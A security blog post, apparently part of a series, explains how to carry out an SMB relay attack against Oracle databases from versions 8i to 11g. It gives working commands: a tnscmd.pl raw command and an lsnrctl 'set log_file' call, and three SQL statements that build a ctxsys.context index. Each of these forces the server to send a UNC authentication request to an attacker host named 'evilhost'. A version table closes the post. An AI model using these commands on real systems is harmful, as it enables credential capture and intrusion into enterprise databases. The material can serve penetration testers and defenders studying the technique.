SMBRelay bible 3. SMBRelay by Oracle

As well as in the previous post, we’ll talk about methods which demand only non-privileged rights. Due to the fact that we have too many ways to conduct the SMB Relay attack for privileged accounts, much depends on the current situation and our rights.

Inro

Our next target is Oracle. Oracle is one of the most widespread RDBMS’s and many enterprises use it as the backend. In fact the versions from 8i to 11g are used. Next information can be applied to each of them.

Runs as

The Oracle server service is run as ‘System’ by default. But like MS SQL, quite often the service is run as a domain/local user account due to different reasons, for example when it is used as a backend for SAP and other ERP systems.

Attack

There are two ways for SMB relay attack to be performed. One of them doesn’t need any privilege, another one needs CONNECT and RESOURCE privileges which can be granted for any user.

1st method – TNS listener set_log.

“The Transparent Network Substrate (TNS) listener is a service which establishes and maintains connections with Oracle database services. When it receives a request from a client, the TNS listener establishes a connection between the client and server over a transparent network substrate, which allows communication regardless of the network protocol being used by either system.”

We can use this method when we posess the remote connection to TNS listener.

Before 10g TNS listener is not defended by password or ‘ADMIN_RESTRICTIONS’ option by default. We should use ‘set_log’ command for the SMB relay.

The command ‘set_log’ sets a way to TNS listener’s log file. We can use either an original Oracle tool – ‘lsnrctl’ or a Perl script – ‘tnscmd’ to exploit this vulnerability.

Example with Perl script:

./tnscmd.pl -h victim.com --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=\\evilhost\test)))"

Example with LSNRCTL:

LSNRCTL>set log_file \\evilhost\test

The next connection with TNS-listener gives you the necessary UNC-request for SMBrelay.

2nd method – ctxsys.context.

This method requires only ‘CONNECT’ and ‘RESOURCE’ roles for an attack which almost all users have. So you need to have at least one real user account in RDBMS. We use the creation of indexes by ctxsys.context to force UNC path request to our host.

There are three steps:

1) Create a special table:

SQL> CREATE TABLE files (id NUMBER PRIMARY KEY, path VARCHAR(255) UNIQUE, ot_format VARCHAR(6));

2) Insert the network path into the new table:

SQL> INSERT INTO files VALUES (1, “\\evilhost\test”, NULL);

3) Create ctxsys.context index on path column:

SQL> CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context PARAMETERS (“datastore ctxsys.file_datastore format column ot_format”);

And then we successfully have SMB Relay.

The full description of this method you can see here: “Penetration from application down to OS (Oracle database)”.

Here is the table showing which method can be used in different versions.

Table 1

Method 8i 9i 10g 11g User needs
set log file OK OK NO NO NO
ctxsys.context OK OK OK OK YES

Do you want more?

Subscribe me to your mailing list